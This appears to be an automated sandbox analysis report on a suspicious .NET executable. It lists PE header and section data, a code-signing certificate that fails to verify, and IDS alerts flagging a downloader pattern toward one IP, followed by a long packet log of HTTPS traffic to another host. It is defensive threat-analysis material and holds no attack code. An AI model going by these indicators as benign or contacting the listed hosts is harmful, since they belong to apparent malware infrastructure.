                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                Signature Valid:false
                                                                                                                                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                Error Number:-2146869232
                                                                                                                                Not Before, Not After
                                                                                                                                • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                                                                                                                Subject Chain
                                                                                                                                • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                                                                                                Version:3
                                                                                                                                Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                                                                                                Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                                                                                                                Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                                                                                                                Serial:6DD2E3173995F51BFAC1D9FB4CB200C1
                                                                                                                                Instruction
                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x43940 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0x10e28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x52e00 | 0x1de0 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x56000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x41994 | 0x41a00 | 0606c138e96f2e286707953ef42f7514 | False | 0.39374627976190474 | data | 5.6884083135074555 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x44000 | 0x10e28 | 0x11000 | f610e0855d271b56b7174997eb33bf0b | False | 0.055893841911764705 | data | 4.109331107170668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x56000 | 0xc | 0x200 | ab05ac80ea86483c92145fda205f7dc6 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x44130 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.046492369572932686
RT_GROUP_ICON | 0x54958 | 0x14 | data | | | 1.15
RT_VERSION | 0x5496c | 0x308 | data | | | 0.4497422680412371
RT_MANIFEST | 0x54c74 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T15:20:35.641728+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49716 | 132.226.247.73 | 80 | TCP
2024-12-03T15:21:00.094889+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49774 | 132.226.247.73 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Dec 3, 2024 15:20:15.913944960 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.019742966 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.019821882 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.028551102 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.028640985 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.040050983 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.040142059 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.052337885 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.052409887 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.058674097 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.058743954 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.071223021 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.071300030 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.084326029 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.084398031 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.090825081 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.090893984 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.102842093 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.102922916 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.102943897 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.102986097 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.115269899 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.115345001 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.127726078 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.127784014 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.134218931 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.134282112 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.203325987 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.203422070 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.209702015 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.209781885 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.215919018 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.215997934 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.224164009 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.224222898 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.244790077 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.244800091 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.244834900 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.244903088 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.244925022 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.244940996 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.252259970 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.252334118 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.252351999 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.252393007 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.255939007 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.256015062 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.262865067 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.262945890 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.269902945 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.269969940 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.272437096 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.272496939 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.277029037 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.277095079 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.280407906 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.280467987 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.282610893 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.282669067 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.286933899 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.286995888 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.290937901 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.291007042 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.293127060 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.293193102 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.297311068 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.297375917 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.299623966 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.299690008 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.324659109 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.324744940 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.404499054 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.404613972 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.405711889 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.405782938 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.410043955 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.410130024 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.412535906 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.412597895 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.414467096 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.414544106 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.418045044 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.418098927 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.422153950 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.422216892 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.423965931 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.424017906 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.427155018 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.427218914 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.428879023 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.428946972 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.438254118 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.438328981 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.440527916 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.440586090 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.443381071 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.443463087 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.445951939 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.446011066 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.448990107 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.449064016 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.450217962 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.450288057 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.451924086 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.451997042 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.455724001 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.455785036 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.456733942 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.456789017 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.458110094 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.458199978 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.460490942 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.460557938 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.462934017 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.462985039 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.464441061 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.464519978 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.470503092 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.470551968 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.470577955 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.470591068 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.470606089 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.472856045 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.472969055 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.472978115 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.473026991 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.475249052 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.475317955 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.476408958 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.476479053 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.552845955 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.552970886 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.554409027 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.554471970 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.556401014 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.556468964 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.558980942 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.559055090 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.606909990 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.607074022 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:16.607562065 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:16.607626915 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.790093899 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.967253923 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.967350006 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.969177961 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.969243050 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.971139908 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.971200943 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.972476959 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.972549915 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.974874973 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.974946022 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.976721048 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.976775885 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.978838921 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.978919983 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.980099916 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.980163097 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.982122898 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.982180119 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.984366894 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.984430075 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.985769033 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.985831022 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:17.985853910 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:17.985897064 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.303503990 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.303601027 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.305377007 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.305439949 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.307463884 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.307521105 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.308665037 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.308726072 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.310904026 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.310966969 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.312922955 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.312983990 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.315095901 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.315159082 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.316411972 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.316471100 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.318465948 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.318530083 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.320672989 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.320734024 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.321971893 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.322031975 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.322909117 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.322962999 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.579849005 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.579946995 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.581542015 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.581609964 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.583461046 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.583523989 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.585880995 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.585942030 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.587400913 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.587460995 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.589174032 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.589277983 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.590251923 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.590328932 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.799896955 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.800017118 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.801558971 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.801634073 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.803679943 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.803744078 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.805823088 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.805876970 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:18.805886984 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:18.860476017 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.040430069 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.040446997 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.040613890 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.042164087 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.042237997 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.044342041 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.044411898 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.045530081 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.045613050 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.257448912 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.257559061 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.258637905 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.258697987 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.519254923 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.519370079 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.521178007 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.521256924 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.523156881 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.523222923 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.524435043 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.524488926 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:19.753060102 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:19.753181934 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.023978949 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.024039030 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.025788069 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.025844097 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.027870893 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.027921915 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.027930021 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.027996063 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.248131037 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.248204947 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.491755962 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.491867065 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.493613005 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.493782997 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.495881081 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.495953083 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.495995998 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.496052980 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.704169989 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.704425097 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.705281019 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.705342054 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.707237959 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.707333088 CET49713443192.168.2.5194.15.112.248
